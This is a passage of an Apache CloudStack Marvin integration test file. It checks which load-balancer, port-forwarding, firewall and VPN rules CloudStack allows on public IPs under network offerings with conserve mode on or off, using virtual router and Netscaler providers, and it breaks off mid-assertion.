# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" P1 tests for network offering
"""
#Import Local Modules
import marvin
from nose.plugins.attrib import attr
from marvin.cloudstackTestCase import *
from marvin.cloudstackAPI import *
from marvin.integration.lib.utils import *
from marvin.integration.lib.base import *
from marvin.integration.lib.common import *
from marvin.remoteSSHClient import remoteSSHClient
import datetime
class Services:
"""Test network offering Services
"""
def __init__(self):
self.services = {
"account": {
"email": "test@test.com",
"firstname": "Test",
"lastname": "User",
"username": "test",
# Random characters are appended for unique
# username
"password": "password",
},
"service_offering": {
"name": "Tiny Instance",
"displaytext": "Tiny Instance",
"cpunumber": 1,
"cpuspeed": 100, # in MHz
"memory": 128, # In MBs
},
"network_offering": {
"name": 'Network offering-VR services',
"displaytext": 'Network offering-VR services',
"guestiptype": 'Isolated',
"supportedservices": 'Dhcp,Dns,SourceNat,PortForwarding,Vpn,Firewall,Lb,UserData,StaticNat',
"traffictype": 'GUEST',
"availability": 'Optional',
"serviceProviderList": {
"Dhcp": 'VirtualRouter',
"Dns": 'VirtualRouter',
"SourceNat": 'VirtualRouter',
"PortForwarding": 'VirtualRouter',
"Vpn": 'VirtualRouter',
"Firewall": 'VirtualRouter',
"Lb": 'VirtualRouter',
"UserData": 'VirtualRouter',
"StaticNat": 'VirtualRouter',
},
},
"network_offering_netscaler": {
"name": 'Network offering-netscaler',
"displaytext": 'Network offering-netscaler',
"guestiptype": 'Isolated',
"supportedservices": 'Dhcp,Dns,SourceNat,PortForwarding,Vpn,Firewall,Lb,UserData,StaticNat',
"traffictype": 'GUEST',
"availability": 'Optional',
"serviceProviderList": {
"Dhcp": 'VirtualRouter',
"Dns": 'VirtualRouter',
"SourceNat": 'VirtualRouter',
"PortForwarding": 'VirtualRouter',
"Vpn": 'VirtualRouter',
"Firewall": 'VirtualRouter',
"Lb": 'Netscaler',
"UserData": 'VirtualRouter',
"StaticNat": 'VirtualRouter',
},
},
"network": {
"name": "Test Network",
"displaytext": "Test Network",
},
"lbrule": {
"name": "SSH",
"alg": "leastconn",
# Algorithm used for load balancing
"privateport": 22,
"publicport": 2222,
"openfirewall": False,
},
"lbrule_port_2221": {
"name": "SSH",
"alg": "leastconn",
# Algorithm used for load balancing
"privateport": 22,
"publicport": 2221,
"openfirewall": False,
},
"natrule": {
"privateport": 22,
"publicport": 22,
"protocol": "TCP"
},
"natrule_port_66": {
"privateport": 22,
"publicport": 66,
"protocol": "TCP"
},
"fw_rule": {
"startport": 1,
"endport": 6000,
"cidr": '55.55.0.0/11',
# Any network (For creating FW rule)
},
"virtual_machine": {
"displayname": "Test VM",
"username": "root",
"password": "password",
"ssh_port": 22,
"hypervisor": 'XenServer',
# Hypervisor type should be same as
# hypervisor type of cluster
"privateport": 22,
"publicport": 22,
"protocol": 'TCP',
},
"ostype": 'CentOS 5.3 (64-bit)',
# Cent OS 5.3 (64 bit)
"sleep": 60,
"timeout": 10,
}
class TestNOVirtualRouter(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.api_client = super(
TestNOVirtualRouter,
cls
).getClsTestClient().getApiClient()
cls.services = Services().services
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client, cls.services)
cls.zone = get_zone(cls.api_client, cls.services)
cls.services['mode'] = cls.zone.networktype
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.services["ostype"]
)
cls.services["virtual_machine"]["zoneid"] = cls.zone.id
cls.services["virtual_machine"]["template"] = cls.template.id
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.services["service_offering"]
)
cls._cleanup = [
cls.service_offering,
]
return
@classmethod
def tearDownClass(cls):
try:
#Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.account = Account.create(
self.apiclient,
self.services["account"],
admin=True,
domainid=self.domain.id
)
self.cleanup = []
return
def tearDown(self):
try:
self.account.delete(self.apiclient)
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
@attr(tags = ["advanced"])
def test_01_network_off_without_conserve_mode(self):
"""Test Network offering with Conserve mode off and VR - All services
"""
# Validate the following
# 1. Create a Network from the above network offering and deploy a VM.
# 2. On source NAT ipaddress, we should NOT be allowed to add a
# LB rules
# 3. On source NAT ipaddress, we should be NOT be allowed to add
# PF rule
# 4. On an ipaddress that has PF rules, we should NOT be allowed to
# add a LB rules.
# 5. On an ipaddress that has Lb rules, we should NOT allow PF rules
# to be programmed.
# 6. We should be allowed to program multiple PF rules on the same Ip
# address on different public ports.
# 7. We should be allowed to program multiple LB rules on the same Ip
# address for different public port ranges.
# 8. On source NAT ipaddress, we should be allowed to Enable VPN.
        # 9. On source NAT ipaddress, we should be allowed to add firewall rules
# Create a network offering with all virtual router services enabled
self.debug(
"Creating n/w offering with all services in VR & conserve mode:off"
)
self.network_offering = NetworkOffering.create(
self.api_client,
self.services["network_offering"],
conservemode=False
)
self.cleanup.append(self.network_offering)
self.debug("Created n/w offering with ID: %s" %
self.network_offering.id)
# Enable Network offering
self.network_offering.update(self.apiclient, state='Enabled')
# Creating network using the network offering created
self.debug("Creating network with network offering: %s" %
self.network_offering.id)
self.network = Network.create(
self.apiclient,
self.services["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=self.network_offering.id,
zoneid=self.zone.id
)
self.debug("Created network with ID: %s" % self.network.id)
self.debug("Deploying VM in account: %s" % self.account.name)
# Spawn an instance in that network
virtual_machine = VirtualMachine.create(
self.apiclient,
self.services["virtual_machine"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(self.network.id)]
)
self.debug("Deployed VM in network: %s" % self.network.id)
src_nat_list = PublicIPAddress.list(
self.apiclient,
associatednetworkid=self.network.id,
account=self.account.name,
domainid=self.account.domainid,
listall=True,
issourcenat=True,
)
self.assertEqual(
isinstance(src_nat_list, list),
True,
"List Public IP should return a valid source NAT"
)
self.assertNotEqual(
len(src_nat_list),
0,
"Length of response from listPublicIp should not be 0"
)
src_nat = src_nat_list[0]
self.debug("Trying to create LB rule on source NAT IP: %s" %
src_nat.ipaddress)
# Create Load Balancer rule with source NAT
with self.assertRaises(Exception):
LoadBalancerRule.create(
self.apiclient,
self.services["lbrule"],
ipaddressid=src_nat.id,
accountid=self.account.name
)
self.debug(
"Trying to create a port forwarding rule in source NAT: %s" %
src_nat.ipaddress)
#Create NAT rule
with self.assertRaises(Exception):
NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule"],
ipaddressid=src_nat.id
)
self.debug("Associating public IP for network: %s" % self.network.id)
ip_with_nat_rule = PublicIPAddress.create(
self.apiclient,
accountid=self.account.name,
zoneid=self.zone.id,
domainid=self.account.domainid,
networkid=self.network.id
)
self.debug("Associated %s with network %s" % (
ip_with_nat_rule.ipaddress,
self.network.id
))
self.debug("Creating PF rule for IP address: %s" %
ip_with_nat_rule.ipaddress)
NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule"],
ipaddressid=ip_with_nat_rule.ipaddress.id
)
self.debug("Trying to create LB rule on IP with NAT: %s" %
ip_with_nat_rule.ipaddress)
# Create Load Balancer rule on IP already having NAT rule
with self.assertRaises(Exception):
LoadBalancerRule.create(
self.apiclient,
self.services["lbrule"],
ipaddressid=ip_with_nat_rule.ipaddress.id,
accountid=self.account.name
)
self.debug("Creating PF rule with public port: 66")
nat_rule = NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule_port_66"],
ipaddressid=ip_with_nat_rule.ipaddress.id
)
# Check if NAT rule created successfully
nat_rules = NATRule.list(
self.apiclient,
id=nat_rule.id
)
self.assertEqual(
isinstance(nat_rules, list),
True,
"List NAT rules should return valid list"
)
self.debug("Associating public IP for network: %s" % self.network.id)
ip_with_lb_rule = PublicIPAddress.create(
self.apiclient,
accountid=self.account.name,
zoneid=self.zone.id,
domainid=self.account.domainid,
networkid=self.network.id
)
self.debug("Associated %s with network %s" % (
ip_with_lb_rule.ipaddress,
self.network.id
))
self.debug("Creating LB rule for IP address: %s" %
ip_with_lb_rule.ipaddress)
LoadBalancerRule.create(
self.apiclient,
self.services["lbrule"],
ipaddressid=ip_with_lb_rule.ipaddress.id,
accountid=self.account.name
)
self.debug("Trying to create PF rule on IP with LB rule: %s" %
ip_with_nat_rule.ipaddress)
with self.assertRaises(Exception):
NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule"],
ipaddressid=ip_with_lb_rule.ipaddress.id
)
self.debug("Creating LB rule with public port: 2221")
lb_rule = LoadBalancerRule.create(
self.apiclient,
self.services["lbrule_port_2221"],
ipaddressid=ip_with_lb_rule.ipaddress.id,
accountid=self.account.name
)
        # Check if LB rule was created successfully
lb_rules = LoadBalancerRule.list(
self.apiclient,
id=lb_rule.id
)
self.assertEqual(
isinstance(lb_rules, list),
True,
"List LB rules should return valid list"
)
self.debug("Creating firewall rule on source NAT: %s" %
src_nat.ipaddress)
#Create Firewall rule on source NAT
fw_rule = FireWallRule.create(
self.apiclient,
ipaddressid=src_nat.id,
protocol='TCP',
cidrlist=[self.services["fw_rule"]["cidr"]],
startport=self.services["fw_rule"]["startport"],
endport=self.services["fw_rule"]["endport"]
)
self.debug("Created firewall rule: %s" % fw_rule.id)
fw_rules = FireWallRule.list(
self.apiclient,
id=fw_rule.id
)
self.assertEqual(
isinstance(fw_rules, list),
True,
"List fw rules should return a valid firewall rules"
)
self.assertNotEqual(
len(fw_rules),
0,
"Length of fw rules response should not be zero"
)
return
@attr(tags = ["advanced"])
def test_02_network_off_with_conserve_mode(self):
"""Test Network offering with Conserve mode ON and VR - All services
"""
# Validate the following
# 1. Create a Network from the above network offering and deploy a VM.
# 2. On source NAT ipaddress, we should be allowed to add a LB rules
# 3. On source NAT ipaddress, we should be allowed to add a PF rules
# 4. On source NAT ipaddress, we should be allowed to add a Firewall
# rules
# 5. On an ipaddress that has Lb rules, we should be allowed to
# program PF rules.
# 6. We should be allowed to program multiple PF rules on the same Ip
# address on different public ports.
# 7. We should be allowed to program multiple LB rules on the same Ip
# address for different public port ranges.
# 8. On source NAT ipaddress, we should be allowed to Enable VPN
# access.
# Create a network offering with all virtual router services enabled
self.debug(
"Creating n/w offering with all services in VR & conserve mode:off"
)
self.network_offering = NetworkOffering.create(
self.api_client,
self.services["network_offering"],
conservemode=True
)
self.cleanup.append(self.network_offering)
self.debug("Created n/w offering with ID: %s" %
self.network_offering.id)
# Enable Network offering
self.network_offering.update(self.apiclient, state='Enabled')
# Creating network using the network offering created
self.debug("Creating network with network offering: %s" %
self.network_offering.id)
self.network = Network.create(
self.apiclient,
self.services["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=self.network_offering.id,
zoneid=self.zone.id
)
self.debug("Created network with ID: %s" % self.network.id)
self.debug("Deploying VM in account: %s" % self.account.name)
# Spawn an instance in that network
virtual_machine = VirtualMachine.create(
self.apiclient,
self.services["virtual_machine"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(self.network.id)]
)
self.debug("Deployed VM in network: %s" % self.network.id)
src_nat_list = PublicIPAddress.list(
self.apiclient,
associatednetworkid=self.network.id,
account=self.account.name,
domainid=self.account.domainid,
listall=True,
issourcenat=True,
)
self.assertEqual(
isinstance(src_nat_list, list),
True,
"List Public IP should return a valid source NAT"
)
self.assertNotEqual(
len(src_nat_list),
0,
"Length of response from listPublicIp should not be 0"
)
src_nat = src_nat_list[0]
self.debug("Trying to create LB rule on source NAT IP: %s" %
src_nat.ipaddress)
# Create Load Balancer rule with source NAT
lb_rule = LoadBalancerRule.create(
self.apiclient,
self.services["lbrule"],
ipaddressid=src_nat.id,
accountid=self.account.name
)
self.debug("Created LB rule on source NAT: %s" % src_nat.ipaddress)
lb_rules = LoadBalancerRule.list(
self.apiclient,
id=lb_rule.id
)
self.assertEqual(
isinstance(lb_rules, list),
True,
"List lb rules should return a valid lb rules"
)
self.assertNotEqual(
len(lb_rules),
0,
"Length of response from listLbRules should not be 0"
)
self.debug(
"Trying to create a port forwarding rule in source NAT: %s" %
src_nat.ipaddress)
#Create NAT rule
nat_rule = NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule"],
ipaddressid=src_nat.id
)
self.debug("Created PF rule on source NAT: %s" % src_nat.ipaddress)
nat_rules = NATRule.list(
self.apiclient,
id=nat_rule.id
)
self.assertEqual(
isinstance(nat_rules, list),
True,
"List NAT should return a valid port forwarding rules"
)
self.assertNotEqual(
len(nat_rules),
0,
"Length of response from listLbRules should not be 0"
)
self.debug("Creating firewall rule on source NAT: %s" %
src_nat.ipaddress)
#Create Firewall rule on source NAT
fw_rule = FireWallRule.create(
self.apiclient,
ipaddressid=src_nat.id,
protocol='TCP',
cidrlist=[self.services["fw_rule"]["cidr"]],
startport=self.services["fw_rule"]["startport"],
endport=self.services["fw_rule"]["endport"]
)
self.debug("Created firewall rule: %s" % fw_rule.id)
fw_rules = FireWallRule.list(
self.apiclient,
id=fw_rule.id
)
self.assertEqual(
isinstance(fw_rules, list),
True,
"List fw rules should return a valid firewall rules"
)
self.assertNotEqual(
len(fw_rules),
0,
"Length of fw rules response should not be zero"
)
self.debug("Associating public IP for network: %s" % self.network.id)
public_ip = PublicIPAddress.create(
self.apiclient,
accountid=self.account.name,
zoneid=self.zone.id,
domainid=self.account.domainid,
networkid=self.network.id
)
self.debug("Associated %s with network %s" % (
public_ip.ipaddress,
self.network.id
))
self.debug("Creating PF rule for IP address: %s" %
public_ip.ipaddress)
NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule"],
ipaddressid=public_ip.ipaddress.id
)
self.debug("Trying to create LB rule on IP with NAT: %s" %
public_ip.ipaddress)
# Create Load Balancer rule on IP already having NAT rule
lb_rule = LoadBalancerRule.create(
self.apiclient,
self.services["lbrule"],
ipaddressid=public_ip.ipaddress.id,
accountid=self.account.name
)
self.debug("Creating PF rule with public port: 66")
nat_rule = NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule_port_66"],
ipaddressid=public_ip.ipaddress.id
)
# Check if NAT rule created successfully
nat_rules = NATRule.list(
self.apiclient,
id=nat_rule.id
)
self.assertEqual(
isinstance(nat_rules, list),
True,
"List NAT rules should return valid list"
)
self.debug("Creating LB rule with public port: 2221")
lb_rule = LoadBalancerRule.create(
self.apiclient,
self.services["lbrule_port_2221"],
ipaddressid=public_ip.ipaddress.id,
accountid=self.account.name
)
        # Check if LB rule was created successfully
lb_rules = LoadBalancerRule.list(
self.apiclient,
id=lb_rule.id
)
self.assertEqual(
isinstance(lb_rules, list),
True,
"List LB rules should return valid list"
)
# User should be able to enable VPN on source NAT
self.debug("Created VPN with source NAT IP: %s" % src_nat.ipaddress)
# Assign VPN to source NAT
vpn = Vpn.create(
self.apiclient,
src_nat.id,
account=self.account.name,
domainid=self.account.domainid
)
vpns = Vpn.list(
self.apiclient,
publicipid=src_nat.id,
listall=True,
)
self.assertEqual(
isinstance(vpns, list),
True,
"List VPNs should return a valid VPN list"
)
self.assertNotEqual(
len(vpns),
0,
"Length of list VPN response should not be zero"
)
return
class TestNOWithNetscaler(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.api_client = super(
TestNOWithNetscaler,
cls
).getClsTestClient().getApiClient()
cls.services = Services().services
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client, cls.services)
cls.zone = get_zone(cls.api_client, cls.services)
cls.services['mode'] = cls.zone.networktype
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.services["ostype"]
)
cls.services["virtual_machine"]["zoneid"] = cls.zone.id
cls.services["virtual_machine"]["template"] = cls.template.id
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.services["service_offering"]
)
cls._cleanup = [
cls.service_offering,
]
return
@classmethod
def tearDownClass(cls):
try:
#Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.account = Account.create(
self.apiclient,
self.services["account"],
admin=True,
domainid=self.domain.id
)
self.cleanup = []
return
def tearDown(self):
try:
self.account.delete(self.apiclient)
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
@attr(tags = ["advancedns"])
def test_01_network_off_without_conserve_mode(self):
"""Test Nw off with Conserve mode off, VR-All services, LB-netscaler
"""
# Validate the following
# 1. Create a Network from the above network offering and deploy a VM.
# 2. On source NAT ipaddress, we should NOT be allowed to add LB rule
# 3. On source NAT ipaddress, we should NOT be allowed to add PF rule
# 4. On an ipaddress that has PF rules, we should NOT be allowed to
# add a LB rules.
# 5. On an ipaddress that has Lb rules , we should NOT allow firewall
# rules to be programmed.
# 6. On an ipaddress that has Lb rules , we should NOT allow PF rules
# to be programmed.
# 7. We should be allowed to program multiple PF rules on the same Ip
# address on different public ports.
# 8. We should be allowed to program multiple LB rules on the same Ip
# address for different public port ranges.
# 9. On source NAT ipaddress, we should NOT be allowed to Enable VPN.
# Create a network offering with all virtual router services enabled
self.debug(
"Creating n/w offering with all services in VR & conserve mode:ON"
)
self.network_offering = NetworkOffering.create(
self.api_client,
self.services["network_offering_netscaler"],
conservemode=False
)
self.cleanup.append(self.network_offering)
self.debug("Created n/w offering with ID: %s" %
self.network_offering.id)
# Enable Network offering
self.network_offering.update(self.apiclient, state='Enabled')
# Creating network using the network offering created
self.debug("Creating network with network offering: %s" %
self.network_offering.id)
self.network = Network.create(
self.apiclient,
self.services["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=self.network_offering.id,
zoneid=self.zone.id
)
self.debug("Created network with ID: %s" % self.network.id)
self.debug("Deploying VM in account: %s" % self.account.name)
# Spawn an instance in that network
virtual_machine = VirtualMachine.create(
self.apiclient,
self.services["virtual_machine"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(self.network.id)]
)
self.debug("Deployed VM in network: %s" % self.network.id)
src_nat_list = PublicIPAddress.list(
self.apiclient,
associatednetworkid=self.network.id,
account=self.account.name,
domainid=self.account.domainid,
listall=True,
issourcenat=True,
)
self.assertEqual(
isinstance(src_nat_list, list),
True,
"List Public IP should return a valid source NAT"
)
self.assertNotEqual(
len(src_nat_list),
0,
"Length of response from listPublicIp should not be 0"
)
src_nat = src_nat_list[0]
self.debug("Trying to create LB rule on source NAT IP: %s" %
src_nat.ipaddress)
# Create Load Balancer rule with source NAT
with self.assertRaises(Exception):
LoadBalancerRule.create(
self.apiclient,
self.services["lbrule"],
ipaddressid=src_nat.id,
accountid=self.account.name
)
self.debug(
"Trying to create a port forwarding rule in source NAT: %s" %
src_nat.ipaddress)
#Create NAT rule
with self.assertRaises(Exception):
NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule"],
ipaddressid=src_nat.id
)
self.debug("Creating firewall rule on source NAT: %s" %
src_nat.ipaddress)
#Create Firewall rule on source NAT
fw_rule = FireWallRule.create(
self.apiclient,
ipaddressid=src_nat.id,
protocol='TCP',
cidrlist=[self.services["fw_rule"]["cidr"]],
startport=self.services["fw_rule"]["startport"],
endport=self.services["fw_rule"]["endport"]
)
self.debug("Created firewall rule: %s" % fw_rule.id)
fw_rules = FireWallRule.list(
self.apiclient,
id=fw_rule.id
)
self.assertEqual(
isinstance(fw_rules, list),
True,
"List fw rules should return a valid firewall rules"
)
self.assertNotEqual(
len(fw_rules),
0,
"Length of fw rules response should not be zero"
)
self.debug("Associating public IP for network: %s" % self.network.id)
ip_with_nat_rule = PublicIPAddress.create(
self.apiclient,
accountid=self.account.name,
zoneid=self.zone.id,
domainid=self.account.domainid,
networkid=self.network.id
)
self.debug("Associated %s with network %s" % (
ip_with_nat_rule.ipaddress,
self.network.id
))
self.debug("Creating PF rule for IP address: %s" %
ip_with_nat_rule.ipaddress)
NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule"],
ipaddressid=ip_with_nat_rule.ipaddress.id
)
self.debug("Trying to create LB rule on IP with NAT: %s" %
ip_with_nat_rule.ipaddress)
# Create Load Balancer rule on IP already having NAT rule
with self.assertRaises(Exception):
LoadBalancerRule.create(
self.apiclient,
self.services["lbrule"],
ipaddressid=ip_with_nat_rule.ipaddress.id,
accountid=self.account.name
)
self.debug("Creating PF rule with public port: 66")
nat_rule = NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule_port_66"],
ipaddressid=ip_with_nat_rule.ipaddress.id
)
# Check if NAT rule created successfully
nat_rules = NATRule.list(
self.apiclient,
id=nat_rule.id
)
self.assertEqual(
isinstance(nat_rules, list),
True,
"List NAT rules should return valid list"
)
self.debug("Associating public IP for network: %s" % self.network.id)
ip_with_lb_rule = PublicIPAddress.create(
self.apiclient,
accountid=self.account.name,
zoneid=self.zone.id,
domainid=self.account.domainid,
networkid=self.network.id
)
self.debug("Associated %s with network %s" % (
ip_with_lb_rule.ipaddress,
self.network.id
))
self.debug("Creating LB rule for IP address: %s" %
ip_with_lb_rule.ipaddress)
LoadBalancerRule.create(
self.apiclient,
self.services["lbrule"],
ipaddressid=ip_with_lb_rule.ipaddress.id,
accountid=self.account.name,
networkid=self.network.id
)
self.debug("Trying to create PF rule on IP with LB rule: %s" %
ip_with_nat_rule.ipaddress)
with self.assertRaises(Exception):
NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule"],
ipaddressid=ip_with_lb_rule.ipaddress.id
)
self.debug("Trying to create FW rule on IP with LB rule")
with self.assertRaises(Exception):
FireWallRule.create(
self.apiclient,
                ipaddressid=ip_with_lb_rule.ipaddress.id,
protocol='TCP',
cidrlist=[self.services["fw_rule"]["cidr"]],
startport=self.services["fw_rule"]["startport"],
endport=self.services["fw_rule"]["endport"]
)
self.debug("Creating LB rule with public port: 2221")
lb_rule = LoadBalancerRule.create(
self.apiclient,
self.services["lbrule_port_2221"],
ipaddressid=ip_with_lb_rule.ipaddress.id,
accountid=self.account.name,
networkid=self.network.id
)
        # Check if LB rule was created successfully
lb_rules = LoadBalancerRule.list(
self.apiclient,
id=lb_rule.id
)
self.assertEqual(
isinstance(lb_rules, list),
True,
"List LB rules should return valid list"
)
        # User should NOT be able to enable VPN on source NAT
self.debug("Enabling VPN on source NAT IP: %s" % src_nat.ipaddress)
# Assign VPN to source NAT
with self.assertRaises(Exception):
Vpn.create(
self.apiclient,
src_nat.id,
account=self.account.name,
domainid=self.account.domainid
)
return
@attr(tags = ["advancedns"])
def test_02_network_off_with_conserve_mode_netscaler(self):
"""Test NW off with Conserve mode ON, LB-Netscaler and VR-All services
"""
# Validate the following
# 1. Create a Network from the above network offering and deploy a VM.
# 2. On source NAT ipaddress, we should NOT be allowed to add LB rule
# 3. On source NAT ipaddress, we should be allowed to add PF rule and
# Firewall rules.
# 4. On an ipaddress that has PF rules, we should NOT be allowed to
# add a LB rules.
# 5. On an ipaddress that has Lb rules , we should NOT allow firewall
# rules to be programmed.
# 6. On an ipaddress that has Lb rules , we should NOT allow PF rules
# to be programmed.
# 7. We should be allowed to program multiple PF rules on the same Ip
# address on different public ports.
# 8. We should be allowed to program multiple LB rules on the same Ip
# address for different public port ranges.
# 9. On source NAT ipaddress, we should be allowed to Enable VPN.
# Create a network offering with all virtual router services enabled
self.debug(
"Creating n/w offering with all services in VR & conserve mode:ON"
)
self.network_offering = NetworkOffering.create(
self.api_client,
self.services["network_offering_netscaler"],
conservemode=True
)
self.cleanup.append(self.network_offering)
self.debug("Created n/w offering with ID: %s" %
self.network_offering.id)
# Enable Network offering
self.network_offering.update(self.apiclient, state='Enabled')
# Creating network using the network offering created
self.debug("Creating network with network offering: %s" %
self.network_offering.id)
self.network = Network.create(
self.apiclient,
self.services["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=self.network_offering.id,
zoneid=self.zone.id
)
self.debug("Created network with ID: %s" % self.network.id)
self.debug("Deploying VM in account: %s" % self.account.name)
# Spawn an instance in that network
virtual_machine = VirtualMachine.create(
self.apiclient,
self.services["virtual_machine"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(self.network.id)]
)
self.debug("Deployed VM in network: %s" % self.network.id)
src_nat_list = PublicIPAddress.list(
self.apiclient,
associatednetworkid=self.network.id,
account=self.account.name,
domainid=self.account.domainid,
listall=True,
issourcenat=True,
)
self.assertEqual(
isinstance(src_nat_list, list),
True,
"List Public IP should return a valid source NAT"
)
self.assertNotEqual(
len(src_nat_list),
0,
"Length of response from listPublicIp should not be 0"
)
src_nat = src_nat_list[0]
self.debug("Trying to create LB rule on source NAT IP: %s" %
src_nat.ipaddress)
# Create Load Balancer rule with source NAT
with self.assertRaises(Exception):
LoadBalancerRule.create(
self.apiclient,
self.services["lbrule"],
ipaddressid=src_nat.id,
accountid=self.account.name
)
self.debug(
"Trying to create a port forwarding rule in source NAT: %s" %
src_nat.ipaddress)
#Create NAT rule
nat_rule = NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule"],
ipaddressid=src_nat.id
)
self.debug("Created PF rule on source NAT: %s" % src_nat.ipaddress)
nat_rules = NATRule.list(
self.apiclient,
id=nat_rule.id
)
self.assertEqual(
isinstance(nat_rules, list),
True,
"List NAT rules should return a valid list of port forwarding rules"
)
self.assertNotEqual(
len(nat_rules),
0,
"Length of response from listPortForwardingRules should not be 0"
)
self.debug("Creating firewall rule on source NAT: %s" %
src_nat.ipaddress)
#Create Firewall rule on source NAT
fw_rule = FireWallRule.create(
self.apiclient,
ipaddressid=src_nat.id,
protocol='TCP',
cidrlist=[self.services["fw_rule"]["cidr"]],
startport=self.services["fw_rule"]["startport"],
endport=self.services["fw_rule"]["endport"]
)
self.debug("Created firewall rule: %s" % fw_rule.id)
fw_rules = FireWallRule.list(
self.apiclient,
id=fw_rule.id
)
self.assertEqual(
isinstance(fw_rules, list),
True,
"List firewall rules should return a valid list"
)
self.assertNotEqual(
len(fw_rules),
0,
"Length of fw rules response should not be zero"
)
self.debug("Associating public IP for network: %s" % self.network.id)
ip_with_nat_rule = PublicIPAddress.create(
self.apiclient,
accountid=self.account.name,
zoneid=self.zone.id,
domainid=self.account.domainid,
networkid=self.network.id
)
self.debug("Associated %s with network %s" % (
ip_with_nat_rule.ipaddress,
self.network.id
))
self.debug("Creating PF rule for IP address: %s" %
ip_with_nat_rule.ipaddress)
NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule"],
ipaddressid=ip_with_nat_rule.ipaddress.id
)
self.debug("Trying to create LB rule on IP with NAT: %s" %
ip_with_nat_rule.ipaddress)
# Create Load Balancer rule on IP already having NAT rule
with self.assertRaises(Exception):
LoadBalancerRule.create(
self.apiclient,
self.services["lbrule"],
ipaddressid=ip_with_nat_rule.ipaddress.id,
accountid=self.account.name
)
self.debug("Creating PF rule with public port: 66")
nat_rule = NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule_port_66"],
ipaddressid=ip_with_nat_rule.ipaddress.id
)
# Check if NAT rule created successfully
nat_rules = NATRule.list(
self.apiclient,
id=nat_rule.id
)
self.assertEqual(
isinstance(nat_rules, list),
True,
"List NAT rules should return valid list"
)
self.debug("Associating public IP for network: %s" % self.network.id)
ip_with_lb_rule = PublicIPAddress.create(
self.apiclient,
accountid=self.account.name,
zoneid=self.zone.id,
domainid=self.account.domainid,
networkid=self.network.id
)
self.debug("Associated %s with network %s" % (
ip_with_lb_rule.ipaddress,
self.network.id
))
self.debug("Creating LB rule for IP address: %s" %
ip_with_lb_rule.ipaddress)
LoadBalancerRule.create(
self.apiclient,
self.services["lbrule"],
ipaddressid=ip_with_lb_rule.ipaddress.id,
accountid=self.account.name,
networkid=self.network.id
)
self.debug("Trying to create PF rule on IP with LB rule: %s" %
ip_with_lb_rule.ipaddress)
with self.assertRaises(Exception):
NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule"],
ipaddressid=ip_with_lb_rule.ipaddress.id
)
self.debug("Trying to create FW rule on IP with LB rule")
with self.assertRaises(Exception):
FireWallRule.create(
self.apiclient,
ipaddressid=ip_with_lb_rule.ipaddress.id,
protocol='TCP',
cidrlist=[self.services["fw_rule"]["cidr"]],
startport=self.services["fw_rule"]["startport"],
endport=self.services["fw_rule"]["endport"]
)
self.debug("Creating LB rule with public port: 2221")
lb_rule = LoadBalancerRule.create(
self.apiclient,
self.services["lbrule_port_2221"],
ipaddressid=ip_with_lb_rule.ipaddress.id,
accountid=self.account.name,
networkid=self.network.id
)
# Check if LB rule was created successfully
lb_rules = LoadBalancerRule.list(
self.apiclient,
id=lb_rule.id
)
self.assertEqual(
isinstance(lb_rules, list),
True,
"List LB rules should return valid list"
)
# User should be able to enable VPN on source NAT
self.debug("Enabling VPN on source NAT IP: %s" % src_nat.ipaddress)
# Assign VPN to source NAT
vpn = Vpn.create(
self.apiclient,
src_nat.id,
account=self.account.name,
domainid=self.account.domainid
)
vpns = Vpn.list(
self.apiclient,
publicipid=src_nat.id,
listall=True,
)
self.assertEqual(
isinstance(vpns, list),
True,
"List VPNs should return a valid VPN list"
)
self.assertNotEqual(
len(vpns),
0,
